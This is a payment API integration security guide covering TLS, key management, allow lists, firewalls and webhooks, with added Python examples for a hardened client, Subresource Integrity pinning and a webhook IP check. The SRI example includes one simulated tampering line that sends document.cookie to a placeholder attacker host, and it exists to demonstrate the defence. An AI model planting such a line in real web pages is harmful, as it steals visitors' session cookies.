Integration Security Guide
Data Protection and SSL/TLS
SSL/TLS Encryption: Jupico uses TLS (the successor to SSL; the SSL protocol versions themselves are obsolete and should not be enabled anywhere) to encrypt all data transmitted between clients and Jupico servers, so that sensitive data such as payment details and personal information cannot be read or altered in transit.
Encryption Standards: Our platform enforces strong protocol versions (TLS 1.2 or higher) to maintain the integrity and confidentiality of data; connections that offer only older versions are refused. Encryption alone does not protect against interception unless the client also verifies the server certificate, so leave certificate and hostname verification enabled in your HTTP client.
Authentication and Credentials Management
API Credentials: Jupico authenticates API requests with API keys. Treat a key as a secret: never hard-code it in source, commit it to version control, or ship it in browser or mobile code, where anyone can extract it. Load it at runtime from an environment variable or a secrets manager, rotate keys regularly, and revoke any key that may have been exposed.
Credential Storage: All credentials are stored using industry-standard encryption mechanisms, ensuring that sensitive information is protected.
IP Whitelisting
IP Allow Lists: Jupico supports IP allow listing to restrict access to your API credentials and services. This feature enables you to specify which IP addresses are permitted to connect to your Jupico integration, adding an additional layer of security.
Network Security
Web Application Firewall (WAF): We recommend deploying a WAF in front of your servers. A WAF helps protect your applications by filtering and monitoring HTTP traffic between a web application and the Internet.
Intrusion Detection System (IDS): Use an IDS to continuously monitor your network for malicious activity or policy violations. An IDS raises alerts on suspicious traffic in near real time; it does not block anything by itself, so pair it with an incident-response process or an intrusion prevention system (IPS) that can act on its alerts before an attack impacts your services.
Minimum Configuration Requirements
API Integration: To securely connect to Jupico’s APIs, ensure that your client environment is configured with the latest security updates and patches. Always use HTTPS with certificate verification left enabled, and authenticate API requests using your Jupico-provided credentials.
Firewall Rules: Configure your firewalls to accept inbound connections (for example, to the endpoint that receives webhooks) only from trusted IP addresses and to drop all other inbound traffic, which limits the attack surface exposed to the Internet. Restrict outbound traffic from the integration host to what it needs, such as HTTPS to Jupico's API.
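The API Credentials and API Integration items above describe a client that loads its key at runtime, refuses to run without it, and only talks over verified TLS 1.2 or higher. The following is an added example of that client skeleton, written for this guide; it is not Jupico's SDK, and the base URL, the environment variable name JUPICO_API_KEY, the `/v1/ping` path and the `Authorization: Bearer` header scheme are placeholder assumptions to be replaced with the values from your Jupico account.

```python
"""Hardened API client skeleton (added example; not Jupico's SDK or endpoints).

Assumptions, labelled as such: the base URL, the environment variable name
JUPICO_API_KEY and the `Authorization: Bearer` scheme are placeholders; use the
values from your Jupico account.
"""
import json
import os
import ssl
import urllib.request

JUPICO_API_BASE = "https://api.example.invalid"  # placeholder, not a real host


class MissingCredentialError(RuntimeError):
    """Raised when no API key is configured, so the process fails closed."""


def load_api_key(env=None, name="JUPICO_API_KEY"):
    """Read the API key from the environment at runtime; never from source code."""
    env = os.environ if env is None else env
    key = env.get(name, "").strip()
    if not key:
        raise MissingCredentialError(f"{name} is not set; refusing to start")
    return key


def build_tls_context():
    """TLS client context: verifies server certificate and hostname, TLS 1.2 minimum."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse TLS 1.0/1.1 and SSL
    return ctx


def build_request(path, body, api_key, base=JUPICO_API_BASE):
    """Authenticated JSON POST; refuses to put the key on a non-HTTPS URL."""
    if not base.lower().startswith("https://"):
        raise ValueError("credentials may only be sent over HTTPS")
    req = urllib.request.Request(
        base.rstrip("/") + "/" + path.lstrip("/"),
        data=json.dumps(body).encode("utf-8"),
        method="POST",
    )
    req.add_header("Content-Type", "application/json")
    req.add_header("Authorization", f"Bearer {api_key}")  # assumed scheme
    return req


def send(req, ctx=None, timeout=10):
    """Send over the hardened context and decode the JSON reply (needs network)."""
    ctx = ctx or build_tls_context()
    with urllib.request.urlopen(req, context=ctx, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))


def redact(api_key):
    """Loggable form of a key: a short prefix only, never the full value."""
    return api_key[:4] + "..." if len(api_key) >= 12 else "***"


if __name__ == "__main__":
    try:
        key = load_api_key()
    except MissingCredentialError as exc:
        raise SystemExit(f"config error: {exc}")
    req = build_request("/v1/ping", {}, key)  # "/v1/ping" is a placeholder path
    print("would POST", req.full_url, "as", redact(key))
    # print(send(req))  # uncomment once JUPICO_API_BASE points at the real API
```

The two fail-closed checks are the point: a missing key stops the process instead of sending an unauthenticated request, and a plain `http://` base URL is rejected before the key can leak onto the wire. Keep `redact` in use wherever the key would otherwise reach a log line.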
Vulnerability Management
Regular Scanning: Jupico employs regular vulnerability scanning on our servers and applications to identify and address potential security issues promptly.
Patch Management: We follow a rigorous patch management process to ensure that all systems are up-to-date with the latest security patches, protecting against known vulnerabilities.
Compliance and Best Practices
PCI DSS Compliance: Jupico is in the process of completing PCI Level 1 certification, which demonstrates our commitment to maintaining the highest standards of security for payment processing.
Security Best Practices: We recommend following best practices for application security, including input validation, secure coding techniques, and regular security assessments.
Incident Response
Monitoring and Alerts: Our systems are continuously monitored for suspicious activity. In the event of a security incident, Jupico has established procedures to quickly respond, investigate, and resolve the issue.
Customer Notifications: If an incident involves customer data, Jupico will notify affected parties promptly and provide guidance on any necessary actions.
Security Considerations
Including JavaScript from external sources exposes your application to their security posture: if an external source is compromised, an attacker can execute arbitrary code on your page, including on the page where payment details are entered. It is common for sites to load scripts from services such as Google Analytics even on secure pages, but we recommend minimizing external scripts wherever possible. Where one cannot be avoided, pin it with a Subresource Integrity (integrity) attribute so the browser refuses a modified copy, and restrict the origins that may supply scripts with a Content Security Policy.
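The standard control when an external script cannot be avoided is Subresource Integrity: the page records a hash of the exact script bytes it was tested with, and the browser refuses to run a copy whose hash differs. The example below, added here and not part of the page or of Jupico's code, computes that `integrity` value and performs the same comparison a browser makes; the script body is a constructed sample, not a real third-party file.

```python
"""Subresource Integrity (SRI) helper: added example, not from the page.

Computes the `integrity` attribute for a script embedded from an external
origin, and checks a fetched copy against it the way a browser does.
"""
import base64
import hashlib
import hmac

# Constructed sample standing in for a vendored third-party script (not real code).
SAMPLE_SCRIPT = b"window.analytics = { track: function (e) { /* ... */ } };\n"

ALGORITHMS = ("sha256", "sha384", "sha512")  # the only digests browsers accept


def sri_digest(body: bytes, algorithm: str = "sha384") -> str:
    """Return 'sha384-<base64 digest>' for the exact bytes that will be served."""
    if algorithm not in ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algorithm}")
    digest = hashlib.new(algorithm, body).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes, algorithm: str = "sha384") -> str:
    """Emit the <script> tag; crossorigin is required for cross-origin SRI checks."""
    return (f'<script src="{src}" integrity="{sri_digest(body, algorithm)}" '
            f'crossorigin="anonymous"></script>')


def verify_sri(body: bytes, integrity: str) -> bool:
    """True only if the fetched bytes hash to the pinned value (constant-time compare)."""
    algorithm, _, expected = integrity.partition("-")
    if algorithm not in ALGORITHMS or not expected:
        return False
    return hmac.compare_digest(sri_digest(body, algorithm), integrity)


def tampered_copy(body: bytes) -> bytes:
    """Simulate a compromised CDN: one extra statement appended to the script."""
    return body + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"


if __name__ == "__main__":
    pinned = sri_digest(SAMPLE_SCRIPT)
    print(script_tag("https://cdn.example.invalid/analytics.js", SAMPLE_SCRIPT))
    print("original verifies:", verify_sri(SAMPLE_SCRIPT, pinned))
    print("tampered verifies:", verify_sri(tampered_copy(SAMPLE_SCRIPT), pinned))
```

Regenerate the pin whenever you deliberately upgrade the vendored script; a provider that silently changes the file will then fail the check, which is exactly the behaviour you want on a payment page. SRI only helps for scripts whose content is fixed, so for providers that serve constantly changing code the practical choices are self-hosting a reviewed copy or not loading the script on sensitive pages at all.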
If you use webhooks, serve the receiving endpoint over TLS so that notifications cannot be intercepted or altered in transit. TLS protects the channel but does not by itself identify the sender, so combine it with the source-IP restrictions described under Firewall Rules above. Note that sensitive information is never included in a webhook event.
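The Firewall Rules item and the webhook note above both come down to accepting inbound connections only from trusted addresses. The following added example (written for this guide, not Jupico's code) shows that allow-list check in application code as a second layer behind the network firewall, including the two edge cases that commonly defeat such checks: an `X-Forwarded-For` header forged by the client, and IPv4 addresses arriving as IPv4-mapped IPv6. The address ranges and the sample requests are constructed placeholders, not Jupico's published addresses.

```python
"""Source-IP allow list for an inbound webhook endpoint (added example, not Jupico code).

The trusted ranges below are constructed placeholders; replace them with the
addresses Jupico gives you. TRUSTED_PROXIES are your own reverse proxies, the
only peers whose X-Forwarded-For header may be believed.
"""
import ipaddress

TRUSTED_RANGES = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "2001:db8:10::/48")]
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def client_address(remote_addr, forwarded_for=None):
    """Resolve the real client address.

    X-Forwarded-For is honoured only when the TCP peer is one of our proxies,
    and then only its rightmost entry, which that proxy appended itself; any
    entries further left may have been supplied by the client.
    """
    addr = ipaddress.ip_address(remote_addr)
    if forwarded_for and any(addr in proxy for proxy in TRUSTED_PROXIES):
        hops = [h.strip() for h in forwarded_for.split(",") if h.strip()]
        if hops:
            addr = ipaddress.ip_address(hops[-1])
    # Dual-stack listeners present IPv4 peers as ::ffff:a.b.c.d; normalise them
    # so an IPv4 allow-list entry still matches.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return addr


def is_allowed(remote_addr, forwarded_for=None):
    """True only if the resolved client lies inside a trusted range; fails closed."""
    try:
        addr = client_address(remote_addr, forwarded_for)
    except ValueError:  # unparsable address or header: reject
        return False
    return any(addr in net for net in TRUSTED_RANGES)


# Constructed sample of inbound requests as (peer address, X-Forwarded-For header).
SAMPLE_REQUESTS = [
    ("203.0.113.7", None),                         # direct, trusted
    ("198.51.100.9", None),                        # direct, untrusted
    ("10.0.0.4", "203.0.113.7"),                   # via our proxy, trusted client
    ("198.51.100.9", "203.0.113.7"),               # forged header, not via our proxy
    ("10.0.0.4", "203.0.113.7, 198.51.100.9"),     # client-supplied left entry ignored
    ("::ffff:203.0.113.7", None),                  # IPv4-mapped, trusted
    ("2001:db8:10::1", None),                      # IPv6, trusted
    ("not-an-ip", None),                           # garbage, rejected
]


def decisions(requests=SAMPLE_REQUESTS):
    """Allow/deny verdict for each sample request, in order."""
    return [is_allowed(peer, xff) for peer, xff in requests]


if __name__ == "__main__":
    for (peer, xff), ok in zip(SAMPLE_REQUESTS, decisions()):
        print(f"{'ALLOW' if ok else 'DENY ':5} peer={peer} xff={xff}")
```

Run the check before any parsing of the webhook body, and return a generic 403 on rejection so the response reveals nothing about the allow list. This is defence in depth, not a replacement for the firewall rule: the firewall stops the connection from ever reaching the application, while this check catches misconfiguration such as a proxy that was added without updating the rules.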
Adhering to Data Security Standards is essential, but it's just the beginning of a comprehensive security approach. To further enhance your understanding of web security, consider exploring the following resources:
Updated 6 months ago